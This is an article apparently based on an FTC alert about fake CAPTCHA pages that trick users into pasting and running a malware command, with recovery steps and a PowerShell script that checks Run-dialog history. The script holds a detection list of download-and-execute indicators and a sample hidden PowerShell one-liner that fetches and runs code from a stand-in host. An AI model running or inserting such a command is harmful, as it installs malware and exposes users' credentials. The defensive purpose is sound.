What Happened
The FTC is sounding the alarm on a new phishing and malware scam that impersonates CAPTCHA requests—those annoying "prove you're not a robot" verification screens that everyone knows and hates.
Here's how it works: You're browsing normally and you get a pop-up that looks like a legitimate CAPTCHA request. It might say "security verification" or something official-sounding. The screen looks almost identical to a real CAPTCHA.
But instead of asking you to click pictures of traffic lights or type letters and numbers, this fake CAPTCHA tells you to type a series of keyboard commands. Something like:
"Windows + R, then Ctrl + V, then Enter"
If you follow those instructions, you're not verifying that you're human. Windows + R opens the Run dialog, Ctrl + V pastes a command the page already dropped onto your clipboard, and Enter runs it. That command fetches and launches the malware, and because you typed it into a system dialog yourself, the browser's usual download warnings never get a chance to fire. Once the malware is running, the scammers can harvest your email login credentials, mobile banking passwords, stored personal information, basically everything saved on that device.
Why This Works (And Why It's Dumb That It Does)
CAPTCHA requests are so ubiquitous now that nobody really thinks about them. You see one and your brain immediately goes into autopilot: "oh, verification. Fine." And if the fake CAPTCHA looks close enough to the real thing, you might not think twice before typing the commands.
The scammers are betting on three things: (1) you're in a hurry, (2) you're not suspicious, and (3) you won't actually read the instructions carefully. They're right most of the time.
The genius of this scam is that it turns perfectly legitimate Windows features against you. The Windows key + R opens the Run dialog. Ctrl + V pastes whatever is on your clipboard. Enter runs it. The missing piece is that the fake CAPTCHA page has already written a command onto your clipboard, typically the moment you clicked its "I'm not a robot" box, so those three keystrokes hand that command to Windows and execute it under your own user account. You installed the malware yourself while thinking you were solving a CAPTCHA, and no file ever had to pass through the browser's download dialog.
What You Should Know
Real CAPTCHAs will NEVER ask you to type keyboard commands, open the Run dialog or a terminal, or paste anything. They ask you to identify pictures, type the letters and numbers shown, or click a checkbox. That's it. If a "CAPTCHA" is asking you to run commands, press Windows + R, or type anything that looks like computer code, it's fake.
If you see a CAPTCHA that asks you to type commands, stop immediately. Don't type anything. Leave the page and close the browser tab. If you already clicked its checkbox, assume your clipboard now holds the scammers' command: copy some harmless text to overwrite it before you paste anything anywhere else.
If You Already Fell For It
The FTC recommends:
- Disconnect from the internet immediately. This cuts the malware off from the scammers, so it can't keep sending out what it finds or pull down further instructions.
- Run a security scan using reputable antivirus software to detect and remove the malware.
- Keep your software and apps up to date. This patches security vulnerabilities that malware exploits.
- Change your passwords from a different, uninfected device and turn on two-factor authentication, in case the scammers already have your logins. Start with your email account, since it can be used to reset everything else.
- Report it to the FTC at ReportFraud.ftc.gov. They use these reports to track scam patterns and warn the public.
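One check worth doing before the machine is wiped, as an added example that is not part of the FTC's guidance: Windows keeps a history of what was typed into the Run dialog (Win + R) under the RunMRU registry key, so the command you pasted is usually still recorded there. The script below lists that history and flags entries that look like this scam. The indicator list and the sample command at the end are assumptions for illustration, not anything observed in a real incident, and the script only reads and reports; it never runs what it finds.

```powershell
# Added triage example (not from the FTC page). Reads the Run-dialog history
# Windows stores under HKCU:\...\Explorer\RunMRU and flags entries that look
# like a pasted fake-CAPTCHA command. Indicator list is illustrative.

function Get-RunDialogHistory {
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return @() }
    $props = Get-ItemProperty -Path $key
    # MRUList is a string of slot letters, most recent first (e.g. 'cab').
    $order = [string]$props.MRUList
    foreach ($ch in $order.ToCharArray()) {
        $slot = [string]$ch
        $raw  = [string]$props.$slot
        if (-not $raw) { continue }
        # Each slot holds "<command>\1"; strip the trailing "\1" marker.
        [pscustomobject]@{
            Slot    = $slot
            Command = $raw -replace '\\1$', ''
        }
    }
}

function Test-ClickFixCommand {
    param([Parameter(Mandatory)][string]$Command)
    # Things a pasted one-liner from this scam commonly combines: a script
    # host, a download, in-memory execution, hidden/encoded flags, and often a
    # reassuring "verification" comment tacked on the end so the Run box looks
    # harmless. Hypothetical list; tune it for your environment.
    $indicators = @(
        'powershell', 'pwsh', 'mshta', 'cmd /c', 'curl ', 'iwr ', 'Invoke-WebRequest',
        'iex', 'Invoke-Expression', 'DownloadString', '-enc', '-w hidden',
        'http://', 'https://', 'robot', 'captcha', 'verification'
    )
    # -match is case-insensitive; escape each indicator so it is a literal match.
    $hits = @($indicators | Where-Object { $Command -match [regex]::Escape($_) })
    [pscustomobject]@{
        Command    = $Command
        Suspicious = ($hits.Count -ge 2)   # one lone hit (e.g. "powershell") is normal use
        Indicators = ($hits -join ', ')
    }
}

# Live check: walk the Run-dialog history and show anything suspicious.
Get-RunDialogHistory |
    ForEach-Object { Test-ClickFixCommand -Command $_.Command } |
    Where-Object Suspicious |
    Format-List

# Constructed sample (not a real observed command) showing what a hit looks like.
$sample = 'powershell -w hidden -c "iex (iwr https://example.invalid/x)"  # I am not a robot - Verification ID: 1234'
Test-ClickFixCommand -Command $sample
```

Run it in a normal PowerShell window on the affected machine and save the output before cleaning up; the flagged command line (its URL in particular) is what an incident responder, your antivirus vendor, or the FTC report will want. The same signal exists in process logs if you have them: Security event 4688 or Sysmon event 1 showing explorer.exe as the parent of powershell.exe, mshta.exe or cmd.exe with a URL in the command line. On a managed fleet, the "Remove Run menu from Start Menu" policy (the NoRun setting) disables Win + R outright and takes this whole trick off the table for users who never need the Run dialog.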
The Bigger Picture
This scam works because there's a fundamental problem: security theater and real security are indistinguishable to most people. A fake CAPTCHA *looks* official because real CAPTCHAs look official. And the instructions to type commands sound plausible because computers do require commands.
Scammers are exploiting the fact that most people trust visual design cues more than they trust their own judgment. If something looks official, it must be official, right?
Wrong. And now your email is compromised.
Sources
FTC: How to Spot a CAPTCHA Scam
FTC: Scams and Fraud Consumer Alerts